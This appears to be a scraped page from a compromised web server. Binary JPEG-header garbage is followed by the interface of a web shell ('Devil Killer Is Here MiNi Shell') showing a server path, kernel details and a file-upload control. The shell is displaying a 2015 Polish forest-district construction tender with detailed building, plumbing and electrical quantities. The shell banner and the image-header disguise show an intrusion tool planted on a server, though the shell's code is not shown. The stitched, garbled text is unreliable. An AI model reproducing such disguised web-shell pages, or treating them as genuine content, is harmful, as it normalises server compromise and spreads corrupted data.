JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20150417/

Linux 9dbcd5f6333d 5.15.0-102-generic #112-Ubuntu SMP Tue Mar 5 16:50:32 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20150417/53983-N-2015.html

<p class="kh_header"><b>Kalisz: Przebudowa i rozbudowa istniejącego budynku Nadleśnictwa Kalisz o pomieszczenia administracyjne oraz budowa murków oporowych - dla potrzeb gospodarki leśnej</b><br>
<b>Numer ogłoszenia: 53983 - 2015; data zamieszczenia: 17.04.2015</b><br>
OGŁOSZENIE O ZAMÓWIENIU - roboty budowlane<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Nadleśnictwo Kalisz z/s w Szałe , ul. Kaliska 195, 62-860 Kalisz, woj. wielkopolskie, tel. 062 7664440, faks 062 7664446.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.kalisz.poznan.lasy.gov.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Inny: Lasy Państwowe.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Przebudowa i rozbudowa istniejącego budynku Nadleśnictwa Kalisz o pomieszczenia administracyjne oraz budowa murków oporowych - dla potrzeb gospodarki leśnej.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> roboty budowlane.</p>
<p><b>II.1.4) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Podstawowe parametry inwestycji: 
Powierzchnia działki 5103/4 - 2500 m2 ,
Powierzchnia zabudowy budynku objętego projektem:
= 210,00 m2 (przed rozbudową)
= 289,80 m2 (po rozbudowie)
Wskaźnik intensywności zabudowy: I= 0,15 
Powierzchnia użytkowa:
= 427,60 m2 (przed rozbudową)
= 574,60 m2 (po rozbudowie)
Kubatura:
= 1651,1 m3 (przed rozbudową) 
= 2349,2 m3 (po rozbudowie) 
Wysokość budynku do kalenicy (od poziomu terenu): 
= 7,60 m i 8,02 m ( w części istniejącej - od poziomu - 1,25 względem 0 projektu ) 
= 8,02 m (w części projektowanej - od poziomu - 2,40 względem 0 projektu)

A. Roboty budowlane: 
1. 	Roboty rozbiórkowe:
1.1 	Rozebranie fundamentów - 14,019 [m3],
1.2 	Rozebranie ścian z cegieł - 77,483 [m3],
1.3 	Rozebranie podłoża z betonu żwirowego - 13,370 [m3],
1.4 	Rozebranie stropów żelbetowych - 58,494 [m3],
1.5 	Rozebranie schodów żelbetowych - 3,948 [m3],
1.6 	Rozebranie dachu - 70,264 [m2].
2.	Podbicie fundamentów istniejących,
2.1 Podbicie fundamentów betonem B25 - 19,616 [m3].
3.	Roboty ziemne: 
3.1 Roboty ziemne mechaniczne - 624,699 [m3],
3.2 Ręczne roboty ziemne - 14,815 [m3].
4.	Roboty fundamentowe:
4.1 	Ławy fundamentowe żelbetowe B25 - 35,425 [m3],
4.2 	Ściany żelbetowe B25 gr. 25 [cm] - 147,182 [m2],
4.3 	Fundamenty z bloczków betonowych na zaprawie cementowej - 14,725 [m3],
4.4 	Ocieplenie ścian budynków płytami styroduru gr. 14,0 [cm] - 25,424 [m3],
4.5 	Izolacje powłokowe bitumiczne poziome - 127,381 [m2],
4.6 	Izolacje powłokowe bitumiczne pionowe  - 234,697 [m2],
5.	Ściany piwnicy i parteru:
5.1 	Ściany budynków z pustaków ceramicznych POROTHERM 38P+W gr. 38 [cm] - 65,960 [m2],
5.2 	Ściany budynków z pustaków ceramicznych POROTHERM 25P+W gr. 25 [cm] - 118,045 [m2],
5.3 	Ściany budynków z pustaków ceramicznych POROTHERM P+W gr. 11,5 [cm] - 191,042 [m2].
6.	Konstrukcja piwnicy i parteru:
6.1 	Słupy żelbetowe prostokątne B25 - 11,221 [m3],
6.2 	Belki żelbetowe B25 - 12,258 [m3],
6.3 	Schody żelbetowe B25 - 15,379 [m2],
6.4 	Przesklepienia o konstrukcji stalowej - 19,0 [m].
7.	Strop nad piwnicą:
7.1 	Stropy z płyt żelbetowych kanałowych - 12 [elementów],
7.2 	Stropy gęstożebrowe TERIVA I - 21,437 [m2],
7.3 	Strop płaski żelbetowy B25 	- 39,395 [m3].
8.	Stropodach:
8.1 	Ściany budynków z pustaków ceramicznych POROTHERM P+W gr. 25,0 [cm] - 102,317 [m2],
8.2 	Słupy żelbetowe B25 - 1,692 [m3],
8.3 	Belki żelbetowe B25 - 4,873 [m3],
8.4 	Ocieplenie ścian budynku płytami styropianowymi gr. 10,0 [cm] - 102,317 [m2],
8.5 	Tynk cienkowarstwowy mineralny ATLAS lub inny równoważny - 102,317 [m2],
8.6 	Dostawa i montaż konstrukcji stalowej stropodachu - 6,504 [t],
8.7 	Dach płaski ocieplony 	- 127,224 [m2],
8.8 	Obróbki blacharskie z blachy ocynkowanej, powlekanej gr. 0,7 [mm] - 92,258 [m2].
9.	Posadzki:
9.1 	Podkłady betonowe B10 na podłożu gruntowym - 13,165 [m3].
9.2 	Izolacje przeciwwilgociowe z folii polietylenowej - 131,65 [m2].
9.3 	Izolacje cieplne i przeciwdźwiękowe z płyt styropianowych EPS 100 gr. 8 [cm] 	- 131,65 [m3],
9.4 	Izolacje cieplne i przeciwdźwiękowe z płyt styropianowych EPS 100 gr. 5 [cm] - 143,860 [m3],
9.5 	Izolacje przeciwwilgociowe z folii polietylenowej - 275,510 [m2],
9.6 	Posadzki cementowe gr. 5,5 [cm] wraz z cokołami - 275,510 [m2],
9.7 	Posadzki z paneli podłogowych AC5 - 265,000 [m2],
9.8 	Posadzki z płytek gresowych barwionych na wskroś 60x60 [cm] - 110,0 [m2],
9.9 	Okładzina schodów wewnętrznych płytami granitowymi - 22,026 [m2],
9.10 	Balustrady schodowe wewnętrzne stalowe, malowane proszkowo - 9,0 [m].
10.	Okładziny ścian:
10.1 	Tynki wewnętrzne zwykłe kat. III - 617,427 [m2],
10.2 	Wewnętrzne gładzie gipsowe - 1379,371 [m2].
10.3 	Dwukrotne malowanie farbami emulsyjnymi powierzchni wewnętrznych 	- 1379,371 [m3],
10.4 	Licowanie ścian płytkami gressowymi 30 x 60 [cm] - 20,520 [m2].
11.	Okładziny sufitów, 
11.1 	Okładziny g-k sufitów na rusztach metalowych - 103,777 [m2],
11.2 	Sufity podwieszone o konstrukcji metalowej z wypełnieniem z wełny drzewnej 60x60x1,5 [cm] np. firmy Heradesing typ. Fine lub innej równoważnej - 60,480 [m2],
11.3 	Sufity podwieszone o konstrukcji metalowej z wypełnieniem płytami z włókien mineralnych np. ECOPHON typ Focus lub inne równoważne -  94,95 [m2],
11.4 	Wewnętrzne gładzie gipsowe dwuwarstwowe na sufitach - 419,170 [m2],
11.5 	Dwukrotne malowanie farbami emulsyjnymi powierzchni wewnętrznych 	- 419,170 [m2],
12.	Stolarka zewnętrzna:
12.1 	Dostawa i montaż okien aluminiowych 	- 54,295 [m2],
12.2  Dostawa i montaż drzwi aluminiowych - 2,415 [m2],
12.3  Dostawa i montaż okien drewnianych zespolonych - 10,686 [m2].
13.	Stolarka wewnętrzna:
13.1 	Drzwi drewniane sosnowe, fabrycznie wykończone - 43,20 [m2],
13.2 	Montaż drzwi aluminiowych dwuskrzydłowych p.poż. - 4,80 [m2],
13.3 	Montaż okien aluminiowych p,poż. - 14,904 [m2],
14.	Elewacja:
14.1 	Dostawa i montaż drewna elewacyjnego do ściany za pośrednictwem podkonstrukcji aluminiowej z warstwą docieplenia w systemie typu Fox Alu - 62,428 [m2],
14.2 	Dostawa i montaż drewna elewacyjnego na pod konstrukcji drewnianej bez ocieplenia do ramy żelbetowej - 79,786 [m2],
14.3 	Okładzina z płytek elewacyjnych w kolorze grafitowym, krycie podwójne w cegiełkę - 75,636 [m2],
14.4 	Ocieplenie ścian płytami styropianowymi gr. 18 [cm] w systemie STOPTER - 211,641 [m2],
14.5 	Wyrównanie ścian styropianem gr. 10,0 [cm] - 46,0 [m2],
14.6 	Tynk cienkowarstwowy mineralny ATLAS lub inny równoważny - 481,131 [m2],
14.7 	Dwukrotne malowanie tynków zewnętrznych fakturowych farbą SILIKATIOWĄ SA - 481,131 [m2],
14.8 	Okładziny schodów zewnętrznych z płyt jednolitych granitu Strzegomskiego - 15,200 [m2],
14.9 	Dostawa i montaż balustrady balkonowej z wypełnieniem ze szkła oraz pochwytem stalowym, malowanym proszkowo - 19,020 [m],
14.10 Dostawa i montaż żaluzji aluminiowych zewnętrznych - 11,723 [m2],
14.11 Dostawa, montaż i uruchomienie podświetlanego LOGA - 1 [kpl.],
14.12 Dwukrotne malowanie powierzchni zewnętrznych tynków fakturowych 
farbą SILIKATOWĄ SA - 150,150 [m2].
15.	Zagospodarowanie terenu:
15.1 	Podbudowa z kruszywa łamanego gr. 15 [cm] po zagęszczeniu - 140,140 [m2],
15.2 	Chodnik z płyt betonowych 80x80x8 [cm] - 140,140 [m2],
15.3 	Dostawa i montaż płyt z granitu Strzegomskiego -	 33,023 [m2],
15.4 	Dostawa i montaż okładziny schodów z płyt całkowitych granitu 
strzegomskiego na schodach zewnętrznych - 5,670 [m2],
15.5 	Dostawa i montaż pochwytu na wspornikach stalowych malowany proszkowo - 96,0 [m],
15.6 	Okładzina z płytek elewacyjnych w kolorze grafitowym, krycie podwójne 
w cegiełkę 	- 63,191 [m2],
15.7 	Dostawa i montaż górnego wykończenia murków granitem strzegomskim - 49,44 [m],
15.8 	Dostawa i sadzenie roślin - 1 [kpl.],
15.9 	Dostawa i ułożenie agrowłókniny - 1299,00 [m2],
15.10 Dostawa i rozścielenie kory drzewnej grubej na grubość 5,0 [cm] - 64,95 [m3],
15.11 Wykonanie trawników dywanowych - 98 [m2],
15.12 Dostawa i montaż ławek parkowych np. Zano domino 6002.440.2 lub innych równoważnych - 3 [szt],
15.13 Dostawa, montaż i uruchomienie systemu nawadniającego - 1397,00 [m2].
16.	Wyposażenie łazienek:
16.1 	Wyposażenie łazienek - 1 [kpl.].

B. Roboty instalacyjne - wod-kan i c.o 
1.	Kanalizacja sanitarna:
1.1 	Ułożenie rurociągów PCV o śr. 50 [mm] w gotowych wykopach wewnątrz budynku - 13,5 [m],
1.2 	Ułożenie rurociągów PCV o śr. 110 [mm] w gotowych wykopach wewnątrz budynku - 9,8 [m],
1.3 	Ułożenie rurociągów PCV o śr. 160 [mm] w gotowych wykopach wewnątrz budynku - 8,6 [m],
1.4 	Dostawa i montaż zlewozmywaków - 3 [szt.],
1.5 	Dostawa i montaż miski ustępowej w ścince lekkiej - 2 [kpl.],
1.6 	Dostawa i montaż systemowego pisuaru w ściance lekkiej - 1 [kpl.],
1.7 	Dostawa i montaż umywalki pojedynczej porcelanowej np. koło Liffe 60 x 48 M21160 lub innej równoważnej - 2 kpl.
1.8 	Dostawa i montaż ustępu z płuczką ustępowa typu: kompakt dla niepełnosprawnych - np. ROCA A341230000 lub inna równoważną 	- 1 [kpl.],
1.9 	Dostawa i montaż umywalki pojedynczej dla niepełnosprawnych np. ROCA A327230000 lub innej równoważnej - 1 [kpl.],
2.	Odprowadzenie skroplin:
2.1 Ułożenie na ścianach rurociągu kanalizacyjnego PCV o śr. 50 [mm] - 9,0 [m],
2.2 Ułożenie na ścianach rurociągu kanalizacyjnego PCV o śr. 32 [mm] - 34,7 [m],
3.	Instalacja wodociągowa:
3.1 	Ułożenie rurociągów miedzianych o średnicy zewnętrznej 15 [mm] na ścianach - 43,0 [m],
3.2 	Ułożenie rurociągów miedzianych o średnicy zewnętrznej 18 [mm] na ścianach - 36,0 [m],
3.3 	Baterie zmywakowe ścienne dn. 15 [mm] - 1 [szt.],
3.4 	Baterie zmywakowe stojące dn. 15 [mm] - 2 [szt.],
3.5 	Baterie stojące o śr. nominalnej 15 [mm] dla niepełnosprawnych np. ROCA A5A3123C00 lub inna równoważna - 1 [szt.],
3.6 	Bateria umywalkowa stojąca o śr. nominalnej 15 [mm] np. Hansgrohe Metris S 31060000 lub inna równoważna - 2 [szt.],
3.7 	Armatura spłukująca pisuary, elektroniczna, sterowana podczerwienią, zasilana baterią 	- 1 [kpl.].
4.	Instalacja c.o:
4.1 	Ułożenie rurociągów miedzianych c.o. o średnicy zewnętrznej 15 [mm] i grubości ścianki 1,0 [mm] - 81 [m],
4.2 	Ułożenie rurociągów miedzianych c.o. o średnicy zewnętrznej 18 [mm] i grubości ścianki 1,0 [mm] - 43 [m],
4.3 	Ułożenie rurociągów miedzianych c.o. o średnicy zewnętrznej 22 [mm] i grubości ścianki 1,0 [mm] - 19 [m],
4.4 	Ułożenie rurociągów miedzianych c.o. o średnicy zewnętrznej 39,2 [mm] i grubości ścianki 1,5 [mm] - 81 [m],
4.5 	Dostawa, montaż, uruchomienie pompy obiegowej o wydajności 4,5 [m3)h] np. WILLO PICO25)1-8 lub innej równoważnej - 1 [szt.],
4.6 	Grzejniki stalowe trzypłytowe - 4 [szt.],
4.7 	Grzejniki stalowe dwupłytowe - 10 [szt.],
4.8 	Grzejniki stalowe jednopłytowe - 2 [szt.].
5.	Technologia kotłowni:
5.1 	Ułożenie rur preizolowanych UPONUR lub innych równoważnych do c.o. 2 x 32 (175mm) - 9,0 [m],
5.2 	Dostawa i montaż pomp obiegowych do c.o. o wydajności do 4,5 [m3)h] np. WILLO PICO25)1-8 - 2 [szt.],
5.3 	Dostawa i montaż pomp obiegowych do c.o. o wydajności do 4,5 [m3)h] np. WILLO PICO25)1-6 (ładowanie podgrzewacza) - 2 [szt.],
5.4 	Dostawa, montaż i uruchomienie pompy ciepła powietrznej o mocy 18,0 [kW] np.  Vitocal 350-A AWHO 120 lub innej równoważnej -1 [kpl],
5.5 	Dostawa, montaż, uruchomienie buforu wody grzewczej Vitocel 100-E lub inny równoważny o pojemności 400 [dm3] -1 [kpl],
5.6 	Siłownik do zaworu trójdrogowego VMM30 lub inny równoważny 	1 [ukł.].
6.	Klimatyzacja:
6.1 	Dostawa i montaż kompletnych, nowych jednostek klimatyzacyjnych oraz ich uruchomienie (2+1) - 3 [szt.],
6.2 	Dostawa i montaż nowej jednostki zewnętrznej oraz jej uruchomienie - 1 [szt.]
6.3 	Demontaż i ponowny montaż jednostek klimatyzacyjnych istniejących oraz ich uruchomienie - 3 [szt.],
6.4 	Montaż nowej jednostki klimatyzacyjnej wewnętrznej oraz ich uruchomienie - 5 [szt],
7.	Zewnętrzna kanalizacja sanitarna wraz z przyłączem:
7.1 	Kanał rurowy z rur PCV łączonych na wcisk o śr. zewn. 160 [mm] - 79,0 [m],
7.2 	Studzienki kanalizacyjne systemowe VAVIN lub inne równoważne o śr. 315 [mm] 	- 4 [szt.],
7.3	Przejście szczelne przez ścianę gr. 20 [cm], komory betonowej dla rury 
PCV 160 [mm] - 1 [szt],
7.4 	Wykonawca w ramach zawartej umowy (ETAP I) opracuje projekt budowlany przyłącza (podłączenia) kanalizacji sanitarnej, uzgodni go z Zamawiającym, przeprowadzi stosowne postępowanie administracyjne i uzyska dokumenty pozwalające na realizację przyłącza sanitarnego, do zewnętrznego kolektora sanitarnego w pasie drogi ul.Kaliskiej. Wykonawca 
w ramach zawartej umowy (ETAP I) wykona stosowne przyłącze (podłączenie) j.w i przeprowadzi stosowne odbiory przy udziale Zamawiającego - 1 [kpl]
8.	Zewnętrzna kanalizacja deszczowa:
8.1 	Ułożenie kanału z rur PCV łączonych na wcisk o śr. zew. 160 [mm] - 110 [m],
8.2 	Ułożenie kanału z rur PCV łączonych na wcisk o śr. zew. 200 [mm] -  45 [m],
8.3 	Studzienki kanalizacyjne systemowe VAVIN zamknięte rurą teleskopową lub inne równoważne o śr. 315 [mm] - 5 [szt.],
8.4 	Studzienki kanalizacyjne systemowe VAVIN zamknięte rurą teleskopową z wpustem deszczowym lub inne równoważne o śr. 315 [mm] - 3 [szt.],
8.5 	Dostawa, posadowienie, montaż, podłączenie żelbetowego zbiornika szczelnego o pojemności 12,0 [m3] - 1 [kpl].
9. 	Wykonawca w ramach zawartej umowy (ETAP I) opracuje projekt budowlany hydrantu zewnętrznego zlokalizowanego w odległości do 75 m od budynku objętego przebudową, uzgodni go z Zamawiającym, przeprowadzi stosowne postępowanie administracyjne i uzyska dokumenty pozwalające na realizację hydrantu zewnętrznego w pasie drogi ul.Kaliskiej. Wykonawca w ramach zawartej umowy (ETAP I) wykona stosowny hydrant zewnętrzny, przeprowadzi badania potwierdzające jego właściwą wydajność oraz dokona stosowne odbiory przy udziale Zamawiającego. 
9.1 	Wykopy - 31,250 [m3],
9.2 	Dostawa i montaż - hydrant pożarowy - dn. 80 [mm] - 1 [kpl.],
9.3 	Dostawa i montaż rurociągów z rur polietylenowych o śr. zew. 90 [mm] 	 - 3,0 [m],
9.4 	Dostawa i montaż komory wodomierzowej wraz z armaturą odcinającą - 1 [stud.],
9.5 	Zawór antyskażeniowy DN 80 [mm] - 1 [kpl.],
9.6 	Wodomierz - 1 [kpl.],
9.7 	Inwentaryzacja geodezyjna - 1 [kpl.].

C. Roboty elektryczne 
1.	Rozdzielna główna-RG,SZR, Agregat:
1.1 	Rozdzielnia główna kompletna - 1 [kpl.],
1.2 	Dostawa, montaż i uruchomienie urządzenia samoczynnego zasilania SZR 100 - 1 [szt.],
1.3 	Dostawa, montaż, uruchomienie agregatu prądotwórczego, przeszkolenie pracowników Zamawiającego w zakresie obsługi i użytkowania - 1 [kpl.]. 
2.	Instalacja oświetlenia wewnętrznego:
2.1 	Ułożenie przewodów kabelkowych  - 1140 [m],
2.2 	Dostawa, montaż uruchomienie opraw oświetleniowych świetlówkowych 2x20 [W] - 62 [kpl.],
2.3 	Dostawa, montaż uruchomienie opraw oświetleniowych świetlówkowych 4x40 [W] - 34 [kpl.],
2.4 	Dostawa, montaż uruchomienie opraw oświetleniowych świetlówkowych przykręcanych zwykłych (EW1, EW2, EW3) - 21 [kpl.],
3.	Instalacja gniazd wtyczkowych oraz instalacje zasilające 230V i 400 V:
3.1 	Ułożenie przewodów kabelkowych do instalacji gniazd wtyczkowych do 7,5 [mm2] - 720 [m],
3.2 	Ułożenie przewodów kabelkowych do instalacji dedykowanych do 7,5 [mm2] - 365 [m],
3.3 	Ułożenie przewodów kabelkowych do instalacji dedykowanych do 30,0 [mm2] - 75 [m],
3.4 	Gniazda instalacyjne podtynkowe - 55 [szt.].
4. 	Instalacja uziemiająca i odgromowa:
4.1 	Montaż uziomów poziomych w wykopie - 90 [m],
4.2 	Pogrążalne uziomy prętowe, pionowe - 6,0 [m]
4.3 	Ułożenie przewodów poziomych instalacji odgromowych nie naprężalnych dn. 8 [mm] - 136 [m],
5.	Sieci komputerowe:
5.1 	Ułożenie przewodów kabelkowych - 1050 [m],
5.2 	Dostawa, montaż, podłączenie, uruchomienie gniazd RJ45 - 17 [szt.]
5.3 	Dostawa, montaż, podłączenie, uruchomienie szafy dystrybucyjnej 19 cali - 1 [kpl.].
6.	Linie kablowe:
6.1 	Ułożenie kabli - 350 [m].
7.	Pomiary:
7.1 	Pomiary elektryczne sprawdzające - 1 [kpl.].
8.	Instalacja alarmowa:
8.1 	Ułożenie przewodów kabelkowych - 325 [m],
8.2 	Montaż czujek ruchu pasywnych na podczerwień - 14 [szt.].
9.	System fotowoltaiczny- orurowanie:
9.1 	Ułożenie rur winidurowych o śr. 47 [mm] - 17,0 [m],
9.2 	Ułożenie przewodów kabelkowych o łącznym przekroju żyły do 12,5 [mm2] - 15 [m].
10.	Oświetlenie zewnętrzne:
10.1 	Ułożenie kabli zasilających - 220 [m],
10.2 	Dostawa, montaż uruchomienie opraw stylowych na ścianach budynków - 4 [kpl.],
10.3 	Dostawa, montaż, uruchomienie projektorów oświetleniowych - 7 [kpl.],
10.4 	Dostawa, montaż, uruchomienie opraw stylowych na murkach - 8 [kpl.],
10.5 	Dostawa, montaż, uruchomienie projektorów oświetleniowych na murkach - 3 [kpl
11. 	Wykonawca w ramach zawartej umowy (ETAP I) przygotuje dokumenty do ZE o zwiększenie mocy przyłączeniowej i ją uzyska dla następujących parametrów: 
Bilans mocy - Rozdzielnica główna RG:
PI = 50 kW
k=0,8 dla oświetlenia
k= 0,5 dla gniazd wtyczkowych 
k= 1 dla technologii 
PS=38kW
IB= 59A 

D. Wyposażenie wnętrz. 
1. 	Wyposażenie wnętrz (dostawa, montaż, ustawienie, regulacja, sprawdzenie funkcjonowania) - 1 [kpl],
2. 	Demontaż i powtórny montaż wyposażenia meblowego pokoi	- 1 [kpl]..</p>

<p><b>II.1.6) Wspólny Słownik Zamówień (CPV):</b> 45.11.10.00-8, 45.40.00.00-1, 45.30.00.00-0, 45.11.12.91-4.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.8) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 05.01.2016.</p>
<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> Przed upływem terminu składania ofert wykonawca wnosi wadium w wysokości 30.000,00 zł, słownie: trzydzieścitysięcyzłotych</p>
<p><b>III.2) ZALICZKI</b></p>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Ocena spełnienia tego warunku zostanie dokonana wg formuły spełnia - nie spełnia, na podstawie złożonego wraz z ofertą oświadczenia, o którym mowa w pkt 7.1. SIWZ</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Warunek ten będzie spełniony, jeżeli wykonawca wykaże, że w okresie ostatnich 5 lat przed upływem terminu składania ofert, a jeżeli okres działalności jest krótszy - w tym okresie, wykonał min. jedną robotę budowlaną polegającą na wykonaniu przebudowy i rozbudowy obiektu w zakresie wszystkich branż (budowlanej, wod-kan,co, elektrycznej, słaboprądowej) o kubaturze co najmniej 2 000,00 m3. i wartości 1000 000,00 zł. 
Ocena spełnienia tego warunku zostanie dokonana wg formuły spełnia - nie spełnia, na podstawie złożonego wraz z ofertą oświadczenia i dokumentów,
o których mowa w pkt 7.1. i 7.2. SIWZ</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Warunek ten będzie spełniony, jeżeli wykonawca wykaże, że w trakcie realizacji zamówienia będzie dysponował osobami posiadającymi:
a)	uprawnienia budowlane kierownika budowy w specjalności konstrukcyjno-budowlanej bez ograniczeń,
b)	uprawnienia budowlane kierownika robót sanitarnych w specjalności instalacyjnej w zakresie instalacji, sieci i urządzeń wodno-kanalizacyjnych bez ograniczeń, 
c)	uprawnienia budowlane kierownika robót elektrycznych w specjalności instalacyjnej w zakresie instalacji, sieci i urządzeń elektrycznych bez ograniczeń.
Ocena spełnienia tego warunku zostanie dokonana wg formuły spełnia - nie spełnia, na podstawie złożonych wraz z ofertą oświadczeń, o których mowa
w pkt 7.1. i 7.3. SIWZ.</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Warunek ten będzie spełniony, jeżeli wykonawca wykaże, że w trakcie realizacji zamówienia będzie dysponował osobami posiadającymi:
